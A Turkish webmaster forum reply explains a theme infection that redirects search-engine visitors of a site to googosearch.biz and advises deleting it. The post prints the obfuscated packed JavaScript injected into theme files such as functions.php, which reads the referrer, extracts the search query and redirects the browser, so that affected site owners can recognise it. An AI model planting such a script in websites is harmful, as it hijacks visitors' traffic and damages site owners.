http://wmaraci.com/forum/webmaster-genel/site-yonleniyor-acil-yardim-11934.html

Ömer Burak adlı üyeden alıntı

googosearch.biz gibi bir yere mi yönleniyor?

Bugünlerde benimde başıma geldi, çerezlerdendir diyerek umursamadım fakat başka pclerde de olunca biraz araştırdım.

temalara eklenen bir kod nedeniyle yönlendirme yapılıyormuş, genelde w.rez temalarda oluyormuş, kullandığım tema öyle değil fakat aynı kodlar benim temamda da çıktı.

genelde footer'a ekliyorlarmış, bende fuctions.php'de çıktı.
temizlemezseniz sandbox'a düşme ihtimali doğuyormuş.

<script>eval(function(p,a,c,k,e,r){e =function(c){return(c35?String.fromCharCode(c+29):c.toStr ing(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2 +t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|m s|google|substring|split||||||ea|ht|tp|document||| go|window|location'.split('|'),0,{}))</script>
varsa silin.